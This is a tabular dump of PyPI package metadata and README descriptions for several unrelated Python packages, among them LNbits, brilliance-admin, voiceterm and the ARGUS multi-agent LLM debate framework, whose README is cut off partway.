Create a pull request and edit the automatically created draft [release notes](https://github.com/espressif/esp-pylib/releases).
## License
This document and the attached source code are released under Apache License Version 2. See the accompanying [LICENSE](./LICENSE) file for a copy.
| text/markdown | Espressif Systems | null | null | null | Apache-2.0 | python, espressif | [
"Development Status :: 1 - Planning",
"Intended Audience :: Developers",
"Natural Language :: English",
"Environment :: Console",
"Topic :: Software Development :: Embedded Systems",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"License :: OSI Approved :: Apache Software License",
"Operating System :: POSIX",
"Operating System :: Microsoft :: Windows",
"Operating System :: MacOS :: MacOS X"
] | [] | null | null | >=3.7 | [] | [] | [] | [
"rich",
"pre-commit; extra == \"dev\"",
"czespressif; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/espressif/esp-pylib",
"Repository, https://github.com/espressif/esp-pylib",
"Source, https://github.com/espressif/esp-pylib/",
"Tracker, https://github.com/espressif/esp-pylib/issues/",
"Changelog, https://github.com/espressif/esp-pylib/blob/master/CHANGELOG.md"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:06:06.673608 | esp_pylib-0.1.3.tar.gz | 6,865 | 33/ad/2761f79ebca03d63f7a6dd326e9861ab68d89913f6a6fef3bcfeeeac83cf/esp_pylib-0.1.3.tar.gz | source | sdist | null | false | 2275deb8b47d91bb4d7d26cbac617d76 | 9c22b9d43a92a466d9e6777482b3138ab3ca33db377675f95c44027bf3eeaef1 | 33ad2761f79ebca03d63f7a6dd326e9861ab68d89913f6a6fef3bcfeeeac83cf | null | [
"LICENSE"
] | 224 |
2.4 | lnbits | 1.5.0rc2 | LNbits, free and open-source Lightning wallet and accounts system. | <a href="https://lnbits.com" target="_blank" rel="noopener noreferrer">
<picture>
<source media="(prefers-color-scheme: dark)" srcset="https://i.imgur.com/QE6SIrs.png">
<img src="https://i.imgur.com/fyKPgVT.png" alt="LNbits" style="width:300px">
</picture>
</a>
 [![license-badge]](LICENSE) [![docs-badge]][docs]  [](https://extensions.lnbits.com/) [](https://shop.lnbits.com/) [<img src="https://img.shields.io/badge/community_chat-Telegram-24A1DE">](https://t.me/lnbits) [<img src="https://img.shields.io/badge/supported_by-%3E__OpenSats-f97316">](https://opensats.org)
<img width="2000" height="203" alt="lnbits_head" src="https://github.com/user-attachments/assets/77669718-ac10-43c7-ae95-6ce236c77401" />
[](https://demo.lnbits.com/tipjar/DwaUiE4kBX6mUW6pj3X5Kg)
# LNbits — The most powerful Bitcoin & Lightning toolkit
> Run it for yourself, for your community, or as part of a larger stack.
## What is LNbits?
LNbits is a lightweight Python server that sits on top of your Lightning funding source. It gives you safe, isolated wallets, a clean API, and an extension system for rapidly adding features - without locking you into a single node implementation. The Inspiration for LNBits came from ideas pioneered by **OpenNode** and **LNPay** — both today work as funding sources for LNbits.
## What you can do with LNbits
- **Harden app security:** Create per-wallet API keys so individual apps never touch your full balance.
- **Extend functionality fast:** Install extensions to explore and ship Lightning features with minimal code.
- **Build into your stack:** Use the LNbits HTTP API to integrate payments, wallets, and accounting.
- **Cover LNURL flows:** Use LNbits as a reliable fallback wallet for LNURL.
- **Demo in minutes:** Spin up instant wallets for workshops, proofs-of-concept, and user testing.
## Funding sources
LNbits runs on top of most Lightning backends. Choose the one you already operate - or swap later without changing your app architecture.
- Read the [funding source guide](https://docs.lnbits.org/guide/wallets.html)
## Learn more
- Video series on [Youtube](https://www.youtube.com/@lnbits)
- Introduction Video [LNBits V1](https://www.youtube.com/watch?v=PFAHKxvgI9Y&t=19s)
## Running LNbits
See the [install guide](https://github.com/lnbits/lnbits/blob/main/docs/guide/installation.md) for details on installation and setup.
Get yourself familiar and test on our demo server [demo.lnbits.com](https://demo.lnbits.com), or on [lnbits.com](https://lnbits.com) software as a service, where you can spin up an LNbits instance for 21sats per hr.
## LNbits account system
LNbits is packaged with tools to help manage funds, such as a table of transactions, line chart of spending, export to csv. Each wallet also comes with its own API keys, to help partition the exposure of your funding source.
<img src="https://i.imgur.com/w8jdGpF.png" style="width:800px">
## LNbits extension universe
Extend YOUR LNbits to meet YOUR needs.
All non-core features are installed as extensions, reducing your code base and making your LNbits unique to you. Extend your LNbits install in any direction, and even create and share your own extensions.
<img src="https://i.imgur.com/aEBpwJF.png" style="width:800px">
## LNbits API
LNbits has a powerful API, many projects use LNbits to do the heavy lifting for their bitcoin/lightning services.
<img src="https://i.imgur.com/V742sb9.png" style="width:800px">
## LNbits node manager
LNbits comes packaged with a light node management UI, to make running your node that much easier.
<img src="https://i.imgur.com/TYqIK60.png" style="width:800px">
## LNbits across all your devices
As well as working great in a browser, LNbits has native IoS and Android apps as well as a chrome extension. So you can enjoy the same UI across ALL your devices.
<img src="https://i.imgur.com/J96EbRf.png" style="width:800px">
## Powered by LNbits
LNbits empowers everyone with modular, open-source tools for building Bitcoin-based systems — fast, free, and extendable.
[](https://shop.lnbits.com/)
[](https://shop.lnbits.com/)
[](https://my.lnbits.com/login)
[](https://news.lnbits.com/)
[](https://extensions.lnbits.com/) [](https://demo.lnbits.com/tipjar/DwaUiE4kBX6mUW6pj3X5Kg)
[docs]: https://github.com/lnbits/lnbits/wiki
[docs-badge]: https://img.shields.io/badge/docs-lnbits.org-673ab7.svg
[github-mypy]: https://github.com/lnbits/lnbits/actions?query=workflow%3Amypy
[github-mypy-badge]: https://github.com/lnbits/lnbits/workflows/mypy/badge.svg
[github-tests]: https://github.com/lnbits/lnbits/actions?query=workflow%3Atests
[github-tests-badge]: https://github.com/lnbits/lnbits/workflows/tests/badge.svg
[codecov]: https://codecov.io/gh/lnbits/lnbits
[codecov-badge]: https://codecov.io/gh/lnbits/lnbits/branch/master/graph/badge.svg
[license-badge]: https://img.shields.io/badge/license-MIT-blue.svg
| text/markdown | null | Alan Bits <alan@lnbits.com> | null | null | null | null | [] | [] | null | null | <3.13,>=3.10 | [] | [] | [] | [
"aiosqlite==0.22.1",
"asyncpg==0.31.0",
"bcrypt==5.0.0",
"bech32==1.2.0",
"bolt11==2.1.1",
"click==8.3.1",
"embit==0.8.0",
"fastapi-sso==0.19.0",
"fastapi==0.116.1",
"filetype==1.2.0",
"greenlet<4.0.0,>=3.3.0",
"grpcio==1.76.0",
"httpx==0.27.2",
"itsdangerous==2.2.0",
"jinja2==3.1.6",
"jsonpath-ng==1.7.0",
"lnurl==0.8.3",
"loguru==0.7.3",
"nostr-sdk==0.44.0",
"packaging==25.0",
"pillow>=12.1.0",
"protobuf==6.33.2",
"pycryptodomex==3.23.0",
"pydantic==1.10.26",
"pyjwt==2.10.1",
"pyln-client==25.12",
"pynostr==0.7.0",
"pyqrcode==1.2.1",
"python-crontab==3.3.0",
"python-dotenv>=1.2.1",
"python-multipart==0.0.21",
"pywebpush==2.2.0",
"shortuuid==1.0.13",
"slowapi==0.1.9",
"sqlalchemy==1.4.54",
"sse-starlette==2.3.6",
"starlette==0.47.1",
"typing-extensions==4.15.0",
"uvicorn==0.40.0",
"uvloop==0.22.1",
"websocket-client==1.9.0",
"websockets==15.0.1",
"breez-sdk-liquid==0.11.11; extra == \"breez\"",
"breez-sdk==0.8.0; extra == \"breez\"",
"wallycore==1.5.1; extra == \"liquid\"",
"psycopg2-binary==2.9.11; extra == \"migration\""
] | [] | [] | [] | [
"Homepage, https://lnbits.com",
"Repository, https://github.com/lnbits/lnbits"
] | uv/0.10.4 {"installer":{"name":"uv","version":"0.10.4","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":true} | 2026-02-20T09:06:05.213497 | lnbits-1.5.0rc2.tar.gz | 3,852,237 | f4/04/b5dfd79e14fdfbebf508f02757b8e9e23cba1bfd4f34d7e7bc30651c2cf1/lnbits-1.5.0rc2.tar.gz | source | sdist | null | false | fd38aec3a943cacbd86cd4753430670d | 109820c9342c843ad2924dc7d7f4b4b86dc3fc5a8cc3834c814312d1e7c8aacf | f404b5dfd79e14fdfbebf508f02757b8e9e23cba1bfd4f34d7e7bc30651c2cf1 | null | [
"LICENSE"
] | 182 |
2.4 | brilliance-admin | 0.44.35 | Simple and lightweight data managment framework powered by FastAPI and Vue3 Vuetify all-in-one. Some call it heavenly in its brilliance. | <div align="center">
<img src="https://github.com/brilliance-admin/backend-python/blob/main/example/static/logo-outline.png?raw=true"
alt="Brilliance Admin"
width="600">
[](https://pypi.org/project/brilliance-admin/)
[](https://github.com/brilliance-admin/backend-python/actions)
Simple and lightweight data management framework powered by `FastAPI` and `Vue3` `Vuetify` all-in-one. \
Integrated with `SQLAlchemy`. Inspaired by Django Admin and DRF.\
_Some call it heavenly in its brilliance._
### [Live Demo](https://brilliance-admin.com/) | [Demo Sources](https://github.com/brilliance-admin/backend-python/tree/main/example) | [Schowcase + Documentation](https://docs.brilliance-admin.com/)
Old repo: https://github.com/Innova-Group-LLC/custom_admin
<img src="https://raw.githubusercontent.com/brilliance-admin/.github/refs/heads/main/screenshots/04.02.2026/all-devices-black.png"
alt="Preview">
<sub>Every ⭐ - helps to make it even more brilliant!</sub>
</div>
> [!TIP]
> If you found a bug or have a feature request, feel free to open an issue.
> [!WARNING]
>Not production ready, work in progress.
Full documentation including project overview, getting started guide, configuration reference, API examples, and component usage is available inside [Documentation](https://docs.brilliance-admin.com/) (GitHub Pages hosted)
| text/markdown | null | null | null | null | null | null | [] | [] | null | null | >=3.10 | [] | [] | [] | [
"asgiref>=3.11",
"fastapi>=0.115",
"jinja2>=3.1",
"PyYAML>=6.0",
"uvicorn>=0.34.0; extra == \"example\"",
"faker>=38.2.0; extra == \"example\"",
"pyjwt>=2.10.1; extra == \"example\"",
"structlog>=25.5.0; extra == \"example\"",
"rich>=14.2.0; extra == \"example\"",
"asyncpg>=0.31.0; extra == \"example\"",
"pydantic-settings>=2.12.0; extra == \"example\"",
"twine; extra == \"example\"",
"pytest>=8.4.2; extra == \"tests\"",
"pytest-asyncio>=1.2.0; extra == \"tests\"",
"httpx>=0.28.1; extra == \"tests\"",
"pytest-mock>=3.15.1; extra == \"tests\"",
"sqlalchemy>=2.0.41; extra == \"tests\"",
"aiosqlite>=0.22.1; extra == \"tests\"",
"factory-boy>=3.3.3; extra == \"tests\"",
"pyjwt>=2.10.1; extra == \"tests\"",
"testcontainers>=4.14.1; extra == \"tests\"",
"scalar-fastapi>=1.5.0; extra == \"scalar\""
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.14.2 | 2026-02-20T09:05:49.926556 | brilliance_admin-0.44.35.tar.gz | 3,677,652 | 4c/4b/070afbab7bd2a5a294d06f64161185d616f483755294d95066a493d2796c/brilliance_admin-0.44.35.tar.gz | source | sdist | null | false | 6901f348a8460e0b97fb1296adfd0a84 | ef878a84e5b583e08838758dcfe8613c98c764bce8065c16275cd1a81cb74dc5 | 4c4b070afbab7bd2a5a294d06f64161185d616f483755294d95066a493d2796c | MIT | [
"LICENSE"
] | 214 |
2.4 | ai-news-scraper | 0.2.0 | A scraper for AI news from The Verge and VentureBeat with JSON export | # AI News Scraper
A lightweight Python package to track AI developments, investments, and trends from The Verge and VentureBeat.
## Installation
```bash
pip install ai-news-scraper
```
## View News
```bash
ai-news
```
## Save News to JSON
```bash
ai-news --save
```
## Save News with a specifc name
```bash
ai-news --save --filename morning_report.json
```
| text/markdown | Your Name | your.email@example.com | null | null | null | null | [
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14"
] | [] | null | null | <4.0,>=3.9 | [] | [] | [] | [
"feedparser<7.0.0,>=6.0.10",
"requests<3.0.0,>=2.31.0"
] | [] | [] | [] | [] | poetry/2.3.2 CPython/3.13.3 Windows/11 | 2026-02-20T09:05:43.107314 | ai_news_scraper-0.2.0-py3-none-any.whl | 3,218 | b8/a3/1cb024244b68c1849aea46a9df22ed0f259b1667627718acf24263e1a6a4/ai_news_scraper-0.2.0-py3-none-any.whl | py3 | bdist_wheel | null | false | f9440c2bb9cdc3a3dec12e0b5c72a9ca | da24eb1741ac73b494923892e285576b61c728e0ba1f75dbb5f3987f3ae898cf | b8a31cb024244b68c1849aea46a9df22ed0f259b1667627718acf24263e1a6a4 | null | [] | 234 |
2.4 | voiceterm | 1.0.87 | Voice-first terminal HUD for Codex and Claude with local Whisper STT | # VoiceTerm
Voice-first terminal HUD for AI CLIs.
Talk instead of type with local Whisper transcription, then send directly to your CLI.
Primary support: Codex and Claude Code.
## Install
```bash
pipx install voiceterm
# or
python3 -m pip install --user voiceterm
```
Then run:
```bash
voiceterm
```
Authenticate your backend once if needed:
```bash
voiceterm --login --codex
voiceterm --login --claude
```
## What This Package Does
The PyPI package installs the `voiceterm` launcher.
On first run, it bootstraps the native VoiceTerm binary into:
- `~/.local/share/voiceterm/native/bin/voiceterm` (default)
By default it builds from the official VoiceTerm repository at the matching
tag (`v<package-version>`).
## Runtime Requirements
- `git`
- Rust toolchain (`cargo`, `rustc`)
- macOS or Linux (Windows via WSL2)
## Optional Environment Overrides
- `VOICETERM_NATIVE_BIN=/absolute/path/to/voiceterm`
- Use an already-installed native binary and skip bootstrap.
- `VOICETERM_PY_NATIVE_ROOT=/custom/root`
- Change where the bootstrap binary is installed.
- `VOICETERM_REPO_URL=https://github.com/jguida941/voiceterm`
- Use a different source repository URL.
- `VOICETERM_REPO_REF=v1.0.69`
- Use a different git tag/branch/commit for bootstrap.
## Documentation
- Main repository: <https://github.com/jguida941/voiceterm>
- Install guide: <https://github.com/jguida941/voiceterm/blob/master/guides/INSTALL.md>
- Usage guide: <https://github.com/jguida941/voiceterm/blob/master/guides/USAGE.md>
- CLI flags: <https://github.com/jguida941/voiceterm/blob/master/guides/CLI_FLAGS.md>
- Troubleshooting: <https://github.com/jguida941/voiceterm/blob/master/guides/TROUBLESHOOTING.md>
| text/markdown | Justin Guida | null | null | null | MIT | claude, cli, codex, terminal, voice, whisper | [
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: MacOS",
"Operating System :: POSIX :: Linux",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Topic :: Software Development :: User Interfaces"
] | [] | null | null | >=3.9 | [] | [] | [] | [] | [] | [] | [] | [
"Homepage, https://github.com/jguida941/voiceterm",
"Repository, https://github.com/jguida941/voiceterm",
"Documentation, https://github.com/jguida941/voiceterm/blob/master/README.md",
"Issues, https://github.com/jguida941/voiceterm/issues"
] | twine/6.2.0 CPython/3.11.14 | 2026-02-20T09:04:23.956804 | voiceterm-1.0.87.tar.gz | 3,703 | f2/71/923bd912931e5b745b91f09b0667164adb47a60b07270f318de961dea271/voiceterm-1.0.87.tar.gz | source | sdist | null | false | 049601ea9ac3e48d86c083ee2064c9be | 785eb797e85935b4abecddcf7a7c722c713b5a6ad6770aca6080f64b926aa7de | f271923bd912931e5b745b91f09b0667164adb47a60b07270f318de961dea271 | null | [] | 206 |
2.4 | argus-debate-ai | 3.1.0 | ARGUS: Production-ready multi-agent AI debate framework with RAG, Bayesian reasoning, provenance tracking, 50+ tool integrations, OpenAPI REST generation, context caching/compression, and advanced LLM orchestration for scientific discovery, fact-checking, and evidence-based decision-making | # ARGUS
**Agentic Research & Governance Unified System**
*A debate-native, multi-agent AI framework for evidence-based reasoning with structured argumentation, decision-theoretic planning, and full provenance tracking.*
[](https://www.python.org/downloads/)
[](https://opensource.org/licenses/MIT)
[](https://pypi.org/project/argus-debate-ai/3.1.0/)
[](https://github.com/psf/black)
[](https://mypy.readthedocs.io/)
[](https://github.com/Ronit26Mehta/argus-ai-debate#tool-integrations-50)
[](https://github.com/Ronit26Mehta/argus-ai-debate#llm-providers-27)
---
## Table of Contents
- [Overview](#overview)
- [Key Innovations](#key-innovations)
- [Features](#features)
- [Installation](#installation)
- [Quick Start](#quick-start)
- [LLM Providers](#llm-providers)
- [Tool Integrations (50+)](#tool-integrations-50)
- [OpenAPI REST Integration](#openapi-rest-integration)
- [Context Caching](#context-caching)
- [Context Compression](#context-compression)
- [Debate Visualization](#debate-visualization)
- [External Connectors](#external-connectors)
- [Visualization & Plotting](#visualization--plotting)
- [Argus Terminal (TUI)](#argus-terminal-tui)
- [Argus-Viz (Streamlit Sandbox)](#argus-viz-streamlit-sandbox)
- [CRUX Protocol](#crux-protocol)
- [Command Line Interface](#command-line-interface)
- [Configuration](#configuration)
- [Architecture](#architecture)
- [Core Components](#core-components)
- [Algorithms](#algorithms)
- [API Reference](#api-reference)
- [Examples](#examples)
- [Testing](#testing)
- [Deployment](#deployment)
- [Contributing](#contributing)
- [License](#license)
---
## Overview
ARGUS implements **Research Debate Chain (RDC)** - a novel approach to AI reasoning that structures knowledge evaluation as multi-agent debates. Instead of single-pass inference, ARGUS orchestrates specialist agents that gather evidence, generate rebuttals, and render verdicts through Bayesian aggregation.
### Why ARGUS?
Traditional LLM applications suffer from:
- **Hallucination**: Models generate plausible but incorrect information
- **Overconfidence**: No calibrated uncertainty estimates
- **Opacity**: Black-box reasoning with no audit trail
- **Single-Point Failure**: One model, one perspective
ARGUS addresses these through:
- **Adversarial Debate**: Multiple agents challenge claims with evidence
- **Bayesian Aggregation**: Calibrated confidence through probability theory
- **Full Provenance**: Every claim traced to its source
- **Multi-Model Support**: Use different LLMs for different roles
---
## Key Innovations
### Conceptual Debate Graph (C-DAG)
A directed graph structure where propositions, evidence, and rebuttals are nodes with signed edges representing support/attack relationships. The graph enables:
- Structured argument representation
- Influence propagation via Bayesian updating
- Conflict detection and resolution
- Visual debugging and analysis
### Evidence-Directed Debate Orchestration (EDDO)
Algorithm for managing multi-round debates with configurable stopping criteria:
- Convergence detection (posterior stability)
- Maximum rounds enforcement
- Budget-based termination
- Information gain thresholds
### Value of Information Planning
Decision-theoretic experiment selection using Expected Information Gain (EIG):
- Prioritize high-value evidence gathering
- Optimal resource allocation under constraints
- Monte Carlo estimation of information value
### Full Provenance Tracking
PROV-O compatible ledger with hash-chain integrity:
- W3C standard compliance
- Cryptographic attestations
- Complete audit trails
- Tamper detection
---
## Features
### Multi-Agent Debate System
| Agent | Role | Capabilities |
|-------|------|--------------|
| **Moderator** | Orchestration | Creates debate agendas, manages rounds, evaluates stopping criteria, breaks ties |
| **Specialist** | Evidence Gathering | Domain-specific research, hybrid retrieval, source quality assessment |
| **Refuter** | Challenge Generation | Counter-evidence, methodological critiques, logical fallacy detection |
| **Jury** | Verdict Rendering | Bayesian aggregation, confidence calibration, label assignment |
### Conceptual Debate Graph (C-DAG)
**Node Types:**
| Type | Description | Attributes |
|------|-------------|------------|
| `Proposition` | Main claims under evaluation | text, prior, domain, status |
| `Evidence` | Supporting/attacking information | polarity, confidence, source, type |
| `Rebuttal` | Challenges to evidence | target_id, strength, rebuttal_type |
| `Finding` | Intermediate conclusions | derived_from, confidence |
| `Assumption` | Underlying premises | explicit, challenged |
**Edge Types:**
| Type | Polarity | Description |
|------|----------|-------------|
| `SUPPORTS` | +1 | Evidence supporting a proposition |
| `ATTACKS` | -1 | Evidence challenging a proposition |
| `REBUTS` | -1 | Rebuttal targeting evidence |
| `REFINES` | 0 | Clarification or specification |
**Propagation:** Log-odds Bayesian belief updating across the graph with configurable decay and damping.
### Hybrid Retrieval System
```
┌─────────────────────────────────────────────────────────────┐
│ Hybrid Retriever │
├─────────────────────────────────────────────────────────────┤
│ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ │
│ │ BM25 Sparse │ │ FAISS Dense │ │ Cross-Encoder│ │
│ │ Retrieval │ -> │ Retrieval │ -> │ Reranking │ │
│ └─────────────┘ └─────────────┘ └─────────────┘ │
│ │ │ │ │
│ v v v │
│ ┌─────────────────────────────────────────────────────┐ │
│ │ Reciprocal Rank Fusion (RRF) │ │
│ └─────────────────────────────────────────────────────┘ │
└─────────────────────────────────────────────────────────────┘
```
**Components:**
- **BM25 Sparse Retrieval**: Traditional keyword-based retrieval with TF-IDF scoring
- **FAISS Dense Retrieval**: Semantic vector search using sentence-transformers
- **Fusion Methods**: Weighted combination or Reciprocal Rank Fusion (RRF)
- **Cross-Encoder Reranking**: Neural reranking for precision (optional)
### Decision-Theoretic Planning
**Expected Information Gain (EIG):**
```python
# Estimate value of an experiment
planner = VoIPlanner(llm=llm, n_samples=1000)
ranked_actions = planner.rank_by_eig(experiments, current_belief)
# Select optimal action set under budget constraint
optimal_set = planner.select_under_budget(experiments, budget=100)
```
**Calibration:**
- Brier Score assessment
- Expected Calibration Error (ECE)
- Temperature scaling for confidence adjustment
- Histogram binning for reliability diagrams
### Provenance & Governance
**Event Types:**
| Event | Description |
|-------|-------------|
| `SESSION_START` | Debate session initialization |
| `PROPOSITION_ADDED` | New proposition registered |
| `EVIDENCE_ADDED` | Evidence attached to proposition |
| `REBUTTAL_ADDED` | Rebuttal targeting evidence |
| `VERDICT_RENDERED` | Jury verdict recorded |
| `SESSION_END` | Session completion |
**Integrity Features:**
- SHA-256 hash chain for tamper detection
- PROV-O compatible event model
- Cryptographic attestations for content
- Query API for filtering and analysis
---
## Installation
### From PyPI (Recommended)
```bash
pip install argus-debate-ai
```
### From Source (Development)
```bash
git clone https://github.com/argus-ai/argus.git
cd argus
pip install -e ".[dev]"
```
### Optional Dependencies
```bash
# All features including development tools
pip install argus-debate-ai[all]
# Individual extras
pip install argus-debate-ai[ollama] # Ollama local LLM support
pip install argus-debate-ai[cohere] # Cohere integration
pip install argus-debate-ai[mistral] # Mistral integration
pip install argus-debate-ai[groq] # Groq LPU inference
pip install argus-debate-ai[arxiv] # arXiv connector
```
### System Requirements
| Requirement | Minimum | Recommended |
|-------------|---------|-------------|
| Python | 3.11+ | 3.12+ |
| RAM | 4 GB | 16 GB |
| Storage | 1 GB | 10 GB (with embeddings) |
| GPU | None | CUDA-compatible (for local embeddings) |
---
## Quick Start
### Basic Usage
```python
from argus import RDCOrchestrator, get_llm
# Initialize with any supported LLM
llm = get_llm("openai", model="gpt-4o")
# Run a debate on a proposition
orchestrator = RDCOrchestrator(llm=llm, max_rounds=5)
result = orchestrator.debate(
"The new treatment reduces symptoms by more than 20%",
prior=0.5, # Start with 50/50 uncertainty
)
print(f"Verdict: {result.verdict.label}")
print(f"Posterior: {result.verdict.posterior:.3f}")
print(f"Evidence: {result.num_evidence} items")
print(f"Reasoning: {result.verdict.reasoning}")
```
### Building a Debate Graph Manually
```python
from argus import CDAG, Proposition, Evidence, EdgeType
from argus.cdag.nodes import EvidenceType
from argus.cdag.propagation import compute_posterior
# Create the graph
graph = CDAG(name="drug_efficacy_debate")
# Add the proposition to evaluate
prop = Proposition(
text="Drug X is effective for treating condition Y",
prior=0.5,
domain="clinical",
)
graph.add_proposition(prop)
# Add supporting evidence
trial_evidence = Evidence(
text="Phase 3 RCT showed 35% symptom reduction (n=500, p<0.001)",
evidence_type=EvidenceType.EMPIRICAL,
polarity=1, # Supports
confidence=0.9,
relevance=0.95,
quality=0.85,
)
graph.add_evidence(trial_evidence, prop.id, EdgeType.SUPPORTS)
# Add challenging evidence
side_effect = Evidence(
text="15% of patients experienced adverse events",
evidence_type=EvidenceType.EMPIRICAL,
polarity=-1, # Attacks
confidence=0.8,
relevance=0.7,
)
graph.add_evidence(side_effect, prop.id, EdgeType.ATTACKS)
# Add rebuttal to the challenge
rebuttal = Rebuttal(
text="Adverse events were mild and resolved without intervention",
target_id=side_effect.id,
rebuttal_type="clarification",
strength=0.7,
confidence=0.85,
)
graph.add_rebuttal(rebuttal, side_effect.id)
# Compute Bayesian posterior
posterior = compute_posterior(graph, prop.id)
print(f"Posterior probability: {posterior:.3f}")
```
### Document Ingestion & Retrieval
```python
from argus import DocumentLoader, Chunker, EmbeddingGenerator
from argus.retrieval import HybridRetriever
# Load documents (supports PDF, TXT, HTML, Markdown, JSON)
loader = DocumentLoader()
doc = loader.load("research_paper.pdf")
# Chunk with overlap for context preservation
chunker = Chunker(chunk_size=512, chunk_overlap=50)
chunks = chunker.chunk(doc)
# Create hybrid retriever
retriever = HybridRetriever(
embedding_model="all-MiniLM-L6-v2",
lambda_param=0.7, # Weight toward dense retrieval
use_reranker=True,
)
retriever.index_chunks(chunks)
# Search with hybrid scoring
results = retriever.retrieve("treatment efficacy results", top_k=10)
for r in results:
print(f"[{r.rank}] Score: {r.score:.3f} - {r.chunk.text[:100]}...")
```
### Multi-Agent Debate
```python
from argus import get_llm
from argus.agents import Moderator, Specialist, Refuter, Jury
from argus import CDAG, Proposition
# Initialize LLM (can use different models for different agents)
llm = get_llm("anthropic", model="claude-3-5-sonnet-20241022")
# Initialize agents
moderator = Moderator(llm)
specialist = Specialist(llm, domain="clinical")
refuter = Refuter(llm)
jury = Jury(llm)
# Create debate graph
graph = CDAG()
prop = Proposition(text="The intervention is cost-effective", prior=0.5)
graph.add_proposition(prop)
# Moderator creates agenda
agenda = moderator.create_agenda(graph, prop.id)
# Specialists gather evidence
evidence = specialist.gather_evidence(graph, prop.id)
# Refuter challenges evidence
rebuttals = refuter.generate_rebuttals(graph, prop.id)
# Jury renders verdict
verdict = jury.evaluate(graph, prop.id)
print(f"Verdict: {verdict.label} (posterior={verdict.posterior:.3f})")
print(f"Reasoning: {verdict.reasoning}")
```
---
## LLM Providers (27+)
ARGUS v3.1 supports **27+ LLM providers** through a unified interface. All providers implement the same `BaseLLM` interface for seamless interchangeability.
### Supported Providers
| Provider | Models | Features | API Key Env Variable |
|----------|--------|----------|---------------------|
| **OpenAI** | GPT-4o, GPT-4, o1 | Generate, Stream, Embed | `OPENAI_API_KEY` |
| **Anthropic** | Claude 3.5 Sonnet, Opus | Generate, Stream | `ANTHROPIC_API_KEY` |
| **Google** | Gemini 1.5 Pro/Flash | Generate, Stream, Embed | `GOOGLE_API_KEY` |
| **Ollama** | Llama 3.2, Mistral, Phi | Local deployment | N/A (local) |
| **Cohere** | Command R, R+ | Generate, Stream, Embed | `COHERE_API_KEY` |
| **Mistral** | Large, Small, Codestral | Generate, Stream, Embed | `MISTRAL_API_KEY` |
| **Groq** | Llama 3.1 70B (ultra-fast) | Generate, Stream | `GROQ_API_KEY` |
| **DeepSeek** | DeepSeek Chat, Coder | Generate, Stream | `DEEPSEEK_API_KEY` |
| **xAI** | Grok-beta | Generate, Stream | `XAI_API_KEY` |
| **Perplexity** | Sonar (search-grounded) | Generate, Stream | `PERPLEXITY_API_KEY` |
| **Together** | 100+ open models | Generate, Stream, Embed | `TOGETHER_API_KEY` |
| **Fireworks** | Fast inference | Generate, Stream | `FIREWORKS_API_KEY` |
| **NVIDIA** | NIM endpoints | Generate, Stream | `NVIDIA_API_KEY` |
| **Azure OpenAI** | GPT-4 on Azure | Generate, Stream, Embed | `AZURE_OPENAI_API_KEY` |
| **AWS Bedrock** | Claude, Llama on AWS | Generate, Stream | AWS credentials |
| **Vertex AI** | Gemini on GCP | Generate, Stream | GCP credentials |
| **+ 10 more** | See docs | Various | Various |
### Usage Examples
#### OpenAI
```python
from argus.core.llm import OpenAILLM
llm = OpenAILLM(model="gpt-4o")
response = llm.generate("Explain quantum computing")
print(response.content)
```
#### Anthropic
```python
from argus.core.llm import AnthropicLLM
llm = AnthropicLLM(model="claude-3-5-sonnet-20241022")
response = llm.generate(
"Analyze this research methodology",
system_prompt="You are a research methodology expert."
)
```
#### Google Gemini
```python
from argus.core.llm import GeminiLLM
llm = GeminiLLM(model="gemini-1.5-pro")
response = llm.generate("Summarize the key findings")
# Also supports embeddings
embeddings = llm.embed(["text to embed"])
```
#### Ollama (Local)
```python
from argus.core.llm import OllamaLLM
llm = OllamaLLM(model="llama3.1", host="http://localhost:11434")
response = llm.generate("What is the capital of France?")
```
#### Cohere
```python
from argus.core.llm import CohereLLM
llm = CohereLLM(model="command-r-plus")
response = llm.generate("Explain machine learning")
# Cohere embeddings with input types
embeddings = llm.embed(
["search query"],
input_type="search_query" # or "search_document"
)
```
#### Mistral
```python
from argus.core.llm import MistralLLM
llm = MistralLLM(model="mistral-large-latest")
response = llm.generate(
"Write a Python function",
temperature=0.3
)
# Streaming
for chunk in llm.stream("Tell me a story"):
print(chunk, end="", flush=True)
```
#### Groq (Ultra-Fast Inference)
```python
from argus.core.llm import GroqLLM
llm = GroqLLM(model="llama-3.1-70b-versatile")
response = llm.generate("Explain photosynthesis")
# Groq also supports audio transcription
transcript = llm.transcribe("audio.wav")
```
### Provider Registry
```python
from argus.core.llm import get_llm, list_providers, register_provider
# List available providers
print(list_providers())
# ['openai', 'anthropic', 'gemini', 'ollama', 'cohere', 'mistral', 'groq']
# Get LLM by provider name
llm = get_llm("groq", model="llama-3.1-70b-versatile")
# Register custom provider
class MyCustomLLM(BaseLLM):
# ... implementation
pass
register_provider("custom", MyCustomLLM)
```
---
## Embedding Models (16+)
ARGUS v3.1 includes 16 embedding providers for semantic search and RAG applications.
### Available Providers
| Type | Providers |
|------|-----------|
| **Local (Free)** | SentenceTransformers, FastEmbed, Ollama |
| **Cloud APIs** | OpenAI, Cohere, HuggingFace, Voyage, Mistral, Google, Azure, Together, NVIDIA, Jina, Nomic, Bedrock, Fireworks |
### Quick Examples
```python
from argus.embeddings import get_embedding, list_embedding_providers
# List all 16 providers
print(list_embedding_providers())
# Local embedding (free, no API key)
embedder = get_embedding("sentence_transformers", model="all-MiniLM-L6-v2")
vectors = embedder.embed_documents(["Hello world", "Machine learning"])
